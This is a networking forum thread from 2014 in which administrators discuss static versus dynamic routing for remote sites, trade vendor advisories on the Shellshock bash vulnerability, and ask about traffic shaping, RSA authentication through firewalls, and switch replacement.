|
Ahdinko posted:Running a network of 25 sites on static routes sounds like it will be hell from an administrative point of view, especially when you add a new subnet/a line goes down/you open a new site. There are a lot of ways to design a network like that, but I'd budget for something that can at least do EIGRP stub in your remote sites like the 2960XR's (which seem to cost so much you might as well go for a 3750x) They don't need a 1Gb connection, I had that wrong. We are doing 100Mb from the remote sites and 1Gb at the hubs, sorry. In your scenario those 10mb lines were just internet connections right? Hense the VPN? We are doing L2 connections, the bandwidth is because we are sending large amounts of data between sites for business functions (video an audio, its TV related). If I plan on using a dynamic routing protocol, I shouldn't need any full L3 devices at the remote sites, correct? Since they have their default gateway set to the state hub, as long as the state hubs do all the route storing/sharing then all the remote sites can stay out of the routing domain? Or do they need to be a part of it to advertise their directly connected routes? whaam fucked around with this message at 11:56 on Sep 25, 2014 |
# ? Sep 25, 2014 11:51 |
|
|
# ? May 28, 2024 06:54 |
|
You can put statics on your hub routers and then redistribute the statics into your IGP, if you like.
|
# ? Sep 25, 2014 16:34 |
|
Anyone found anything about whether the Shellshock exploit is vulnerable on Cisco gear?
|
# ? Sep 25, 2014 17:23 |
|
jwh posted:You can put statics on your hub routers and then redistribute the statics into your IGP, if you like. Ahh perfect that's what I was hoping, thanks.
|
# ? Sep 25, 2014 20:11 |
|
Slickdrac posted:Anyone found anything about whether the Shellshock exploit is vulnerable on Cisco gear? We are sweating it out too. It's too early to know yet. I haven't seen anything official from Cisco yet except an acknowledgement that they are checking.
|
# ? Sep 26, 2014 00:23 |
|
They really can't fly with that answer. Every other vender we have in our environment has already identified which devices are vulnerable, which vectors are potentially open, and tossed patches over. Granted, most venders likely already knew about this and were being gagged by 3 letter agencies. But even then, Cisco almost certainly should have known about it. They at least have the resources to ID things quicker than this. I'm already having to run a total outage, a mostly outage, and 30+ individual site outages tonight, I would have liked to not have to (potentially) do poo poo on the weekend for once.
|
# ? Sep 26, 2014 06:03 |
|
Since I had to go digging for it tonight, here's Juniper's response and risk assessment per-product. If anyone finds something relating to Force10 () gear I'd appreciate a link.
|
# ? Sep 26, 2014 06:35 |
|
All Checkpoint firewalls as well are vulnerable. Though if you restrict your source IPs for management, you're okay. They have a patch out as well already.
|
# ? Sep 26, 2014 06:45 |
|
Slickdrac posted:They really can't fly with that answer. Every other vender we have in our environment has already identified which devices are vulnerable, which vectors are potentially open, and tossed patches over. Granted, most venders likely already knew about this and were being gagged by 3 letter agencies. But even then, Cisco almost certainly should have known about it. They at least have the resources to ID things quicker than this. I'm still waiting for a release of IOS 15.3 that has the heartbleed issue fixed. edit: Cisco released 153-3.M4 today, 25 September closing the heartbleed bug. I expect 153-3.M5 for Shellshock around January 2015.
|
# ? Sep 26, 2014 07:44 |
|
Nobody exposes their management ports to the world anyway, right?
|
# ? Sep 26, 2014 08:42 |
|
^ That. As for a list of vulnerable cisco products, wouldn't one be able to surmise which type of tear may be vulnerable by knowing if there's some unix flavor underneath? IOS and IOS XR shouldn't be, but IOS XE (IOS running as a daemon on linux) is likely to be?
|
# ? Sep 26, 2014 13:50 |
|
falz posted:^ That. IOS-XR is QNX under the hood, but the only shell I can find in QNX (on my 9k at least) is ksh. Apparently I don't have the right license to access the IOS-XE shell, but based on other people's observations of it, it uses bash as a shell so it would be vulnerable (if you could find some way to get to it from the network).
|
# ? Sep 26, 2014 15:48 |
|
F5 put this out: http://support.f5.com/kb/en-us/solutions/public/15000/600/sol15629.html https://devcentral.f5.com/articles/shellshock-mitigation-with-big-ip-irules
|
# ? Sep 26, 2014 15:54 |
|
For Shellshock:quote:The following Cisco products are currently under investigation: At least our PIX's are safe! Ahdinko fucked around with this message at 17:22 on Sep 26, 2014 |
# ? Sep 26, 2014 17:11 |
|
Palo Alto released a statement today as well, though it's only vulnerable if you allow anyone to authenticate to PANOS via ssh.
|
# ? Sep 26, 2014 20:30 |
|
Here's some advisories I've collected to save some time: Blue Coat: https://kb.bluecoat.com/index?page=content&id=SA82&actp=RSS Check Point: https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk102673 Cisco: http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash Polycom: http://supportdocs.polycom.com/PolycomService/support/global/documents/support/documentation/Security_Bulletin_bash_shellshocked_v1_0.pdf Riverbed: https://supportkb.riverbed.com/support/index?page=content&id=S24997 Also this guy is posting advisory updates for several vendors: http://www.mnemonic.no/en/Andre-sprak/English/Blog/Status-on-products-versus-vulnerability-in-Bash-CVE-2014-6271/
|
# ? Sep 26, 2014 20:41 |
|
Docjowles posted:If anyone finds something relating to Force10 () gear I'd appreciate a link. Force10 is fine - something official is being worked on at the moment.
|
# ? Sep 27, 2014 02:28 |
|
jwh posted:Palo Alto released a statement today as well, though it's only vulnerable if you allow anyone to authenticate to PANOS via ssh. Same thing as A10s.
|
# ? Sep 27, 2014 07:04 |
LOL Cisco
|
|
# ? Sep 27, 2014 19:28 |
|
z0rlandi viSSer posted:LOL Not really. A very small subset of products is vulnerable - less so than Heartbleed.
|
# ? Sep 30, 2014 00:41 |
|
Some very important ones , though . And the "owned" part will be us waiting around trying to see when or if a patch will be available (on some products, no, you have to upgrade instead). Even if bash is vulnerable to exploit, again, you have to get somewhere where you can exploit it, and under most circumstances in a wrapped tomcat application or their dummy "shells" they give you, I would hope that opportunity isn't there for anyone to fudge with it, so it's still something to be aware of.
|
# ? Sep 30, 2014 22:41 |
|
Traffic shaping question. We have a 20Mbps link to our ISP, burstable to 100Mbps. We're billed at 95th percentile. We recently ran into a large overage, as our outbound 95th usage was 56Mbps for the month. We want to shape the traffic so that we can avoid overages like this. If I use 'shape average', I know I can limit it to, say, 20Mbps and know we'll never have an overage - but then we lose bursts. If I do 'shape peak', I can throttle the bursts, but not guarantee that we'll go over. Is there middle ground, or a formula I can use to figure out the best values for peak shaping? This is on a 1941 router.
|
# ? Oct 2, 2014 19:01 |
|
Anyone have an old ACS 4.2.0 appliance DVD laying around? We need to do a password recovery for the CLI, which you apparently need the disc for, but can't find the thing. Or if anyone knows where to get one fairly inexpensively that'd work too.
|
# ? Oct 3, 2014 16:40 |
|
Richard Noggin posted:Traffic shaping question. We have a 20Mbps link to our ISP, burstable to 100Mbps. We're billed at 95th percentile. We recently ran into a large overage, as our outbound 95th usage was 56Mbps for the month. We want to shape the traffic so that we can avoid overages like this. If I use 'shape average', I know I can limit it to, say, 20Mbps and know we'll never have an overage - but then we lose bursts. If I do 'shape peak', I can throttle the bursts, but not guarantee that we'll go over. Is there middle ground, or a formula I can use to figure out the best values for peak shaping? This is on a 1941 router. Not really, no. Shape peak will allow you to use the bandwidth if it's available, and because this is likely an ethernet interface, there's no true back pressure.
|
# ? Oct 3, 2014 17:27 |
|
Panthrax posted:Anyone have an old ACS 4.2.0 appliance DVD laying around? We need to do a password recovery for the CLI, which you apparently need the disc for, but can't find the thing. Or if anyone knows where to get one fairly inexpensively that'd work too. I'll take a look Monday.
|
# ? Oct 4, 2014 01:30 |
|
Does anyone have a recommendation for any device (preferably a full firewall) that has full RSA integration? That can pop up a splash page with login and things for next pin, reset pin, create pin, etc.?
|
# ? Oct 6, 2014 16:13 |
|
I vaguely recall the RSA appliance itself has a web portal for such purposes built in.
|
# ? Oct 6, 2014 18:13 |
|
inignot posted:I vaguely recall the RSA appliance itself has a web portal for such purposes built in. Correct, the RSA software/appliance has a Self-Service console to allow the user to resync, reset, etc. Slickdrac posted:Does anyone have a recommendation for any device (preferably a full firewall) that has full RSA integration? That can pop up a splash page with login and things for next pin, reset pin, create pin, etc.? Are you looking to use RSA for management of the firewall or authenticate VPN connections?
|
# ? Oct 6, 2014 18:23 |
|
H.R. Paperstacks posted:Are you looking to use RSA for management of the firewall or authenticate VPN connections? Auth for inbound connections to private public facing IPs for Web, FTP, SSH, etc. that doesn't go via our VPN. Firewall functionality is more a perk as we need a new pair of Non Checkpoint firewalls to replace the CPs in that zone.
|
# ? Oct 6, 2014 20:37 |
|
Slickdrac posted:Auth for inbound connections to private public facing IPs for Web, FTP, SSH, etc. that doesn't go via our VPN. Firewall functionality is more a perk as we need a new pair of Non Checkpoint firewalls to replace the CPs in that zone. Out of curiosity - why replace Check point?
|
# ? Oct 6, 2014 20:39 |
|
Slickdrac posted:Auth for inbound connections to private public facing IPs for Web, FTP, SSH, etc. that doesn't go via our VPN. Firewall functionality is more a perk as we need a new pair of Non Checkpoint firewalls to replace the CPs in that zone. For instances like that, you would install the RSA agents on the systems, not the firewall. The firewall would just handle the standard src/dst filtering, the actual authentication is going to be handled by the system itself.
|
# ? Oct 6, 2014 20:53 |
|
ior posted:Out of curiosity - why replace Check point? That's a much nicer way of asking that than I did. It probably would have gotten about the same amount of non answer that I got though. H.R. Paperstacks posted:For instances like that, you would install the RSA agents on the systems, not the firewall. The firewall would just handle the standard src/dst filtering, the actual authentication is going to be handled by the system itself. We must proxy it through a "Pane of glass"
|
# ? Oct 6, 2014 20:55 |
|
Slickdrac posted:We must proxy it through a "Pane of glass" You want a remote client to SSH to an IP (is it a NAT'd Public --> RFC1918 IP?), but you first want the firewall/<device> to terminate the SSH session and perform RSA Two-Factor Authentication before passing the SSH session to the destination IP? How is the client expected to authenticate to the destination IP?
|
# ? Oct 6, 2014 22:59 |
|
Auth at the device and then something with it, the RSA internal service, and Ping Federate are all working together or something to pass the authed user into the destination. I'm not actually the one running the whole idea, just got asked if I could find out about such a firewall device. Right now these pages are authing inside and are privatized by white listing IPs, which isn't really ideal.
|
# ? Oct 7, 2014 10:52 |
|
Slickdrac posted:Auth at the device and then something with it, the RSA internal service, and Ping Federate are all working together or something to pass the authed user into the destination. I'm not actually the one running the whole idea, just got asked if I could find out about such a firewall device. Right now these pages are authing inside and are privatized by white listing IPs, which isn't really ideal. What you are wanting to do really isn't possible with a firewall since you do not terminate sessions to it other than transparently doing NAT/PAT and some SSL Proxying. Firewall integration with an RSA appliance is mainly for authenticating management connections on the control plane, not client connections flowing through it. RSA integration for SSH/HTTP/HTTPS is all handled by a agent service that runs on the server itself. You could look into something more along the lines of a load balancer, like an F5 BIP-IP, but even then, it will only be good for MITM'ing a HTTP/HTTPS request.
|
# ? Oct 7, 2014 14:32 |
|
Funny, that's exactly who they were calling this morning. I'm trying to just stay out of the way of this now so I don't end up in the blast zone when this idea blows up.
|
# ? Oct 7, 2014 15:48 |
|
Is any one else here a UC guy, primarily Cisco but ... Lync/Polycom inter op as well ? This stuff is a massive pain in the rear end to wrap around which product almost sort of works for a bunch of money, and which are terrible.
|
# ? Oct 9, 2014 00:24 |
|
H.R. Paperstacks posted:What you are wanting to do really isn't possible with a firewall since you do not terminate sessions to it other than transparently doing NAT/PAT and some SSL Proxying. Firewall integration with an RSA appliance is mainly for authenticating management connections on the control plane, not client connections flowing through it. RSA integration for SSH/HTTP/HTTPS is all handled by a agent service that runs on the server itself. This isn't strictly true. You can use RSA for auth in an RAVPN scenario. Also you could do what he is asking by using the auth proxy feature on ASA with a dash of the IDFW stuff. We did that with the client authenticating to a webportal hosted by the ASA. AD group membership would determine the ACL applied to the session. No reason I can think of that it wouldn't work just fine with RSA/SecurID integration. Unless I'm completely blowing it on what he's trying to do.
|
# ? Oct 10, 2014 01:30 |
|
Tremblay posted:This isn't strictly true. You can use RSA for auth in an RAVPN scenario. Also you could do what he is asking by using the auth proxy feature on ASA with a dash of the IDFW stuff. We did that with the client authenticating to a webportal hosted by the ASA. AD group membership would determine the ACL applied to the session. No reason I can think of that it wouldn't work just fine with RSA/SecurID integration. Unless I'm completely blowing it on what he's trying to do. Yeah, I could be misunderstanding him as well, but to me it sounds like he wants to perform authentication at the firewall, and if successful, be forwarded on to the actual system hosting the destination service. Are the services behind setup without any authentication mechanism of their own? I could see that with HTTP/HTTPS but not SSH/FTP like he mentions, since you have to provide UN/PW/keys for authentication on the system hosting the actual destination service as well.
|
# ? Oct 10, 2014 13:59 |
|
|
# ? May 28, 2024 06:54 |
I've been tasked to replace an old Cisco 3500XL-series gigabit switch, and seeing as I've never worked with something of this magnitude I figured I could ask in here What would be viable options to look into? In terms of budget, I don't really have a limit but I thinking something in the $750-1500 range would be feasible.
|
|
# ? Oct 10, 2014 16:44 |